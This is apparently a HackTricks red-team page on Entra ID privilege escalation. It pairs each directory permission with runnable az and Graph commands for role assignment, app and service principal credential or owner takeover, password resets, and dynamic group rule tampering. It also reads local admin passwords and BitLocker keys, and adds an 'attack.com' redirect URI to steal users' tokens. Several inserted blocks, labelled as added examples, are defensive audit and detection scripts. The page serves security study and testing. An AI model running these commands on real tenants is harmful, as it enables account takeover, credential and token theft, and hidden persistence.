Az - EntraID Privesc

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

note

Note that not all the granular permissions that built-in roles have in Entra ID can be used in custom roles.

Roles

Role: Privileged Role Administrator

This role has the granular permissions needed to assign roles to principals and to add further permissions to roles. Both actions can be abused to escalate privileges.

  • Assign a role to a user:

```bash
# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
```

  • Add more permissions to a role:

```bash
# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'
```
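A defender-side check for the custom-role abuse described above, added here as an example (not HackTricks code): it parses the roleDefinitions response returned by the az rest GET above and flags custom roles that grant any of the granular actions discussed on this page. The SENSITIVE_ACTIONS set and the sample response are constructed for the example.

```python
import json

# Added example (not HackTricks code): flag custom Entra ID roles that grant any of the
# granular actions discussed on this page. Input is the JSON body returned by
# GET https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions
SENSITIVE_ACTIONS = {
    "microsoft.directory/applications/credentials/update",
    "microsoft.directory/applications.myOrganization/credentials/update",
    "microsoft.directory/applications/owners/update",
    "microsoft.directory/applications/allProperties/update",
    "microsoft.directory/servicePrincipals/credentials/update",
    "microsoft.directory/servicePrincipals/synchronizationCredentials/manage",
    "microsoft.directory/servicePrincipals/owners/update",
    "microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials",
    "microsoft.directory/groups/allProperties/update",
    "microsoft.directory/groups/owners/update",
    "microsoft.directory/groups/members/update",
    "microsoft.directory/groups/dynamicMembershipRule/update",
    "microsoft.directory/users/basic/update",
    "microsoft.directory/devices/registeredOwners/update",
    "microsoft.directory/devices/registeredUsers/update",
    "microsoft.directory/deviceLocalCredentials/password/read",
    "microsoft.directory/bitlockerKeys/key/read",
}

def flag_custom_roles(role_definitions_json):
    """Return {displayName: [sensitive actions]} for every custom (isBuiltIn == false)
    role whose rolePermissions grant at least one action from SENSITIVE_ACTIONS."""
    findings = {}
    for role in json.loads(role_definitions_json).get("value", []):
        if role.get("isBuiltIn", True):
            continue  # built-in roles are expected to hold these; only custom ones are audited
        granted = set()
        for perm in role.get("rolePermissions", []):
            granted.update(perm.get("allowedResourceActions", []))
        hits = sorted(granted & SENSITIVE_ACTIONS)
        if hits:
            findings[role["displayName"]] = hits
    return findings

# Constructed sample response mirroring the roleDefinitions shape (not real tenant data)
SAMPLE = json.dumps({"value": [
    {"displayName": "Global Administrator", "isBuiltIn": True,
     "rolePermissions": [{"allowedResourceActions": ["microsoft.directory/applications/credentials/update"]}]},
    {"displayName": "App Secret Rotator", "isBuiltIn": False,
     "rolePermissions": [{"allowedResourceActions": ["microsoft.directory/applications/basic/update",
                                                     "microsoft.directory/applications/credentials/update"]}]},
    {"displayName": "Helpdesk Readers", "isBuiltIn": False,
     "rolePermissions": [{"allowedResourceActions": ["microsoft.directory/users/basic/read"]}]},
]})
```

Feeding it the raw output of the az rest GET above audits a real tenant; any role it reports should be reviewed against the assignments on it.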

Applications

microsoft.directory/applications/credentials/update

This allows an attacker to add credentials (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker could authenticate as that application and obtain those permissions.

```bash
# Generate a new password without overwriting the existing ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwriting the existing ones
az ad app credential reset --id <appId> --create-cert
```

microsoft.directory/applications.myOrganization/credentials/update

This allows the same actions as applications/credentials/update, but scoped to single-directory applications.

```bash
az ad app credential reset --id <appId> --append
```

microsoft.directory/applications/owners/update

By adding themselves as an owner, an attacker can modify the application, including its credentials and permissions.

```bash
az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>
```

microsoft.directory/applications/allProperties/update

An attacker could add a redirect URI to applications used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user had already consented to the application, the authentication happens automatically without the user needing to accept anything.

Note that it's also possible to modify the permissions the application requests in order to obtain more permissions, but in that case the user will need to accept again the prompt requesting all the permissions.

```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"
```

Service Principals

microsoft.directory/servicePrincipals/credentials/update

This allows an attacker to add credentials to existing service principals. If the service principal has elevated permissions, the attacker could take over those permissions.

```bash
az ad sp credential reset --id <sp-id> --append
```

caution

The newly created password won't be shown in the web console, so this can be a stealthy way to maintain persistence over the service principal.
From the API they can be found with: az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

If you get the error "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." it's because the passwordCredentials property of the SP cannot be modified and you first need to unlock it. To do so you need the permission (microsoft.directory/applications/allProperties/update) that lets you run:

```bash
# The lock is a property of the application object, so the path takes the application's object id
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<app-object-id> --body '{"servicePrincipalLockConfiguration": null}'
```

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

This allows an attacker to add credentials to existing service principals. If the service principal has elevated permissions, the attacker could take over those permissions.

```bash
az ad sp credential reset --id <sp-id> --append
```

microsoft.directory/servicePrincipals/owners/update

As with applications, this permission allows adding more owners to a service principal. Owning a service principal allows controlling its credentials and permissions.

```bash
# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id "$spId" --append

# You can check the owners with
az ad sp owner list --id "$spId"
```

caution

After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't found, even though that is the method you need to use to remove an owner. So you can't remove owners nowadays.

microsoft.directory/servicePrincipals/disable and enable

These permissions allow disabling and enabling service principals. An attacker could use them to enable a service principal they can somehow access in order to escalate privileges.

Note that for this technique the attacker will need further permissions to take control of the enabled service principal.

```bash
# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true
```

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

These permissions allow creating and reading password single sign-on credentials, which could grant access to third-party applications.

```bash
# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"

# Get the credentials stored for a specific credID (the request is sent to the service principal)
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"
```

Applications Privilege Escalation

As explained in this post, it was very common to find default applications with API permissions of type Application granted to them. An API Permission (as it's called in the Entra ID console) of type Application means that the application can access the API without a user context (without a user logging into the application), and without needing any Entra ID role to allow it. Therefore, it's very common to find highly privileged applications in every Entra ID tenant.

So, if an attacker has any permission/role that allows updating the credentials (secret or certificate) of an application, the attacker could create a new credential and then use it to log in as the application, obtaining all the permissions the application has.

Note that the mentioned blog post shares some API permissions of default Microsoft applications; however, shortly after that report Microsoft fixed the issue and it's no longer possible to log in as Microsoft applications. Nevertheless, it's still possible to find highly privileged default applications that can be abused.
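Since every credential or owner added to an application or service principal lands in the Entra ID audit log, the abuse described in this section and in the Service Principals section above is detectable. The following triage routine is an added example (not HackTricks code) over records shaped like auditLogs/directoryAudits entries; the activity display names it matches and the sample records are assumptions constructed for the example and must be confirmed against your own tenant's logs.

```python
# Added example (not HackTricks code): triage Entra ID audit-log records for the
# app / service principal credential and owner additions this page describes.
# The activity display names are assumptions; confirm them in your tenant's logs.
CREDENTIAL_ACTIVITIES = {"Update application – Certificates and secrets management",
                         "Add service principal credentials"}
OWNER_ACTIVITIES = {"Add owner to application", "Add owner to service principal"}

def actor_of(event):
    """UPN of the initiating user, or the display name of the initiating app."""
    by = event.get("initiatedBy", {})
    if by.get("user"):
        return by["user"].get("userPrincipalName", "<unknown-user>")
    return by.get("app", {}).get("displayName", "<unknown-app>")

def triage_audit_events(events):
    """events: dicts shaped like auditLogs/directoryAudits records.
    Returns (severity, actor, activity, target) for successful credential or owner
    additions; an actor adding themselves as owner is 'high' (self-grant pattern)."""
    alerts = []
    for ev in events:
        if ev.get("result") != "success":
            continue  # failed attempts are worth logging elsewhere, not alerting here
        activity = ev.get("activityDisplayName", "")
        targets = ev.get("targetResources", [])
        target = next((t.get("displayName") for t in targets
                       if t.get("type") in ("Application", "ServicePrincipal")), "?")
        actor = actor_of(ev)
        if activity in CREDENTIAL_ACTIVITIES:
            alerts.append(("medium", actor, activity, target))
        elif activity in OWNER_ACTIVITIES:
            added = {t.get("userPrincipalName") for t in targets if t.get("type") == "User"}
            alerts.append(("high" if actor in added else "medium", actor, activity, target))
    return alerts

# Constructed sample records (not real tenant data)
SAMPLE_EVENTS = [
    {"activityDisplayName": "Add service principal credentials", "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"type": "ServicePrincipal", "displayName": "sync-connector"}]},
    {"activityDisplayName": "Add owner to service principal", "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "mallory@contoso.example"}},
     "targetResources": [{"type": "ServicePrincipal", "displayName": "sync-connector"},
                         {"type": "User", "userPrincipalName": "mallory@contoso.example"}]},
    {"activityDisplayName": "Add service principal credentials", "result": "failure",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"type": "ServicePrincipal", "displayName": "billing-api"}]},
]
```

Correlating a "medium" credential alert with a sign-in by the same service principal from a new IP shortly afterwards is the pattern that turns this into a confirmed takeover.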


Groups

microsoft.directory/groups/allProperties/update

This permission allows adding users to privileged groups, resulting in privilege escalation.

```bash
az ad group member add --group <GroupName> --member-id <UserId>
```

Note: This permission excludes role-assignable Entra ID groups.

microsoft.directory/groups/owners/update

This permission allows becoming the owner of groups. A group owner can control the group's membership and settings, thereby escalating privileges through the group.

```bash
az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>
```

Note: This permission excludes role-assignable Entra ID groups.

microsoft.directory/groups/members/update

This permission allows adding members to a group. An attacker could add themselves or malicious accounts to privileged groups that grant elevated access.

```bash
az ad group member add --group <GroupName> --member-id <UserId>
```

microsoft.directory/groups/dynamicMembershipRule/update

This permission allows updating the membership rules of a dynamic group. An attacker could modify the dynamic rules to include themselves in privileged groups without being explicitly added.

```bash
groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'
```

Note: This permission excludes role-assignable Entra ID groups.

Dynamic Groups Privesc

It may be possible for users to escalate privileges by modifying their own properties so that they get added as members of dynamic groups. For more information check:

Az - Dynamic Groups Privesc

Users

microsoft.directory/users/password/update

This permission allows resetting the password of non-administrator users, letting an attacker who holds it escalate to those users. This permission cannot be granted to custom roles.

```bash
az ad user update --id <user-id> --password "kweoifuh.234"
```

microsoft.directory/users/basic/update

This permission allows modifying user properties. It's common to find dynamic groups that add users based on attribute values, so this permission could allow a user to set the attribute value required to become a member of a specific dynamic group and escalate privileges.

```bash
# e.g. change the manager of a user (the victim's manager reference is pointed at managerUser)
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"

# e.g. change the department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
```
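The dynamicMembershipRule/update and users/basic/update abuses above share one root cause: a dynamic group whose rule keys on an attribute that a low-privileged principal can change. The following audit is an added example (not HackTricks code) that scans group objects as returned by the Graph groups endpoint for such rules; the set of editable attributes and the sample groups are assumptions constructed for the example, and the first sample rule is the one shown on this page.

```python
import re

# Added example (not HackTricks code): flag dynamic groups whose membership rule depends
# on user attributes that the users/basic/update permission (or the user) can change.
# The editable-attribute set below is an assumption; adjust it to your tenant's settings.
USER_EDITABLE_ATTRS = {"department", "jobTitle", "companyName", "city", "state", "country",
                       "employeeId", "otherMails", "officeLocation", "postalCode"}
RULE_ATTR = re.compile(r"\buser\.([A-Za-z0-9_]+)")

def rule_attributes(rule):
    """All user.<attribute> references in a dynamic membership rule string."""
    return set(RULE_ATTR.findall(rule))

def audit_dynamic_groups(groups):
    """groups: dicts shaped like GET /groups results (displayName, membershipRule,
    membershipRuleProcessingState). Returns [(displayName, [risky attributes])] for
    groups with an active rule that references an attribute from USER_EDITABLE_ATTRS."""
    findings = []
    for g in groups:
        rule = g.get("membershipRule")
        if not rule or g.get("membershipRuleProcessingState") != "On":
            continue  # static groups and paused rules do not auto-add members
        risky = sorted(rule_attributes(rule) & USER_EDITABLE_ATTRS)
        if risky:
            findings.append((g["displayName"], risky))
    return findings

# Constructed sample groups (not real tenant data); the first rule is the one from this page
SAMPLE_GROUPS = [
    {"displayName": "Security Guests", "membershipRuleProcessingState": "On",
     "membershipRule": '(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")'},
    {"displayName": "Sec Team", "membershipRuleProcessingState": "On",
     "membershipRule": '(user.department -eq "security")'},
    {"displayName": "All Members", "membershipRuleProcessingState": "On",
     "membershipRule": '(user.userType -eq "member")'},
    {"displayName": "Paused Rule", "membershipRuleProcessingState": "Paused",
     "membershipRule": '(user.department -eq "security")'},
]
```

A flagged group that also carries a role assignment or Azure RBAC role is the one to fix first, by keying the rule on attributes only HR-synchronised sources can write.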

Conditional Access Policies & MFA Bypass

Misconfigured conditional access policies that require MFA could be bypassed, check:

Az - Conditional Access Policies & MFA Bypass

Devices

microsoft.directory/devices/registeredOwners/update

This permission allows attackers to add themselves as owners of devices in order to gain control of, or access to, device-specific settings and data.

```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```

microsoft.directory/devices/registeredUsers/update

This permission allows attackers to associate their accounts with devices in order to gain access or bypass security policies.

```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```

microsoft.directory/deviceLocalCredentials/password/read

This permission allows attackers to read the local administrator account properties stored for Microsoft Entra joined devices, including the password.

```bash
# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLCID="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials"
```

BitLocker Keys

microsoft.directory/bitlockerKeys/key/read

This permission allows accessing BitLocker keys, which could let an attacker unlock disks, compromising data confidentiality.

```bash
# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```

Other Interesting Permissions (TODO)

  • microsoft.directory/applications/permissions/update
  • microsoft.directory/servicePrincipals/permissions/update
  • microsoft.directory/applications.myOrganization/allProperties/update
  • microsoft.directory/applications/allProperties/update
  • microsoft.directory/servicePrincipals/appRoleAssignedTo/update
  • microsoft.directory/applications/appRoles/update
  • microsoft.directory/applications.myOrganization/permissions/update
